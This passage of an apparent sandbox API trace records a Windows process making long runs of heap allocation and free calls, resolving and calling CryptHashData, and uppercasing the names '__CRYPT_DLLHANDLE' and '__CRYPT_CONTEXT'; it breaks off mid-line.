Flags=0x0, Size=0x4) returned 0x9c2748 [0158.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0158.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0158.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0158.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0158.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0158.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0158.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0158.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0158.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4a0 [0158.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0158.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0158.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0158.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0158.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0158.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0158.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0158.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0158.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0158.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0158.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0158.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0158.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0158.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0158.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0158.284] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0158.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0158.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0158.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0158.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0158.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0158.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0158.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0158.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0158.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0158.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0158.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0158.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0158.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0158.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0158.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0158.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0158.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0158.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0158.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0158.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0158.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0158.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0158.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0158.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0158.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0158.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0158.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0158.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0158.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0158.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0158.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0158.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0158.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0158.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0158.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0158.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0158.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0158.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0158.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0158.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0158.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0158.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0158.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0158.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0158.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0158.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0158.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe) returned 0x9bd810 [0158.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x9bd810, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0158.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0158.287] GetProcAddress (hModule=0x74f20000, lpProcName="CryptHashData") returned 0x74f2df36 [0158.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0158.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0158.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0158.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0158.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0158.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0158.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0158.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0158.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0158.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0158.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0158.287] CryptHashData (hHash=0x90af58, pbData=0x8df028, dwDataLen=0x19, dwFlags=0x1) returned 1 [0158.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0158.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0158.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4a0 [0158.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0158.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0158.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0158.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0158.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0158.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0158.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0158.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0158.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0158.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0158.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0158.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0158.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0158.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0158.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0158.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0158.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0158.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0158.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4c0 [0158.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0158.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0158.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0158.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0158.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0158.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0158.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0158.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0158.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0158.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0158.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0158.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0158.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0158.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0158.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0158.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0158.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0158.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0158.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0158.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0158.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0158.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0158.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0158.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0158.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0158.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0158.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0158.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0158.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0158.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0158.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0158.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0158.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0158.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0158.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0158.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0158.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0158.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0158.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0158.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0158.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0158.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0158.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0158.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0158.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0158.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0158.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0158.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0158.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0158.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0158.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0158.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0158.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0158.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0158.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0158.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0158.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0158.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0158.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0158.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0158.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0158.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0158.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0158.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0158.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0158.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0158.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0158.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0158.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0158.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0158.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0158.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.293] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0158.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0158.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd888 [0158.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0158.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0158.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0158.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0158.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0158.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0158.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0158.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0158.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0158.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0158.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0158.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0158.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0158.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0158.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0158.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0158.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0158.294] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0158.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0158.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0158.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd588 [0158.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 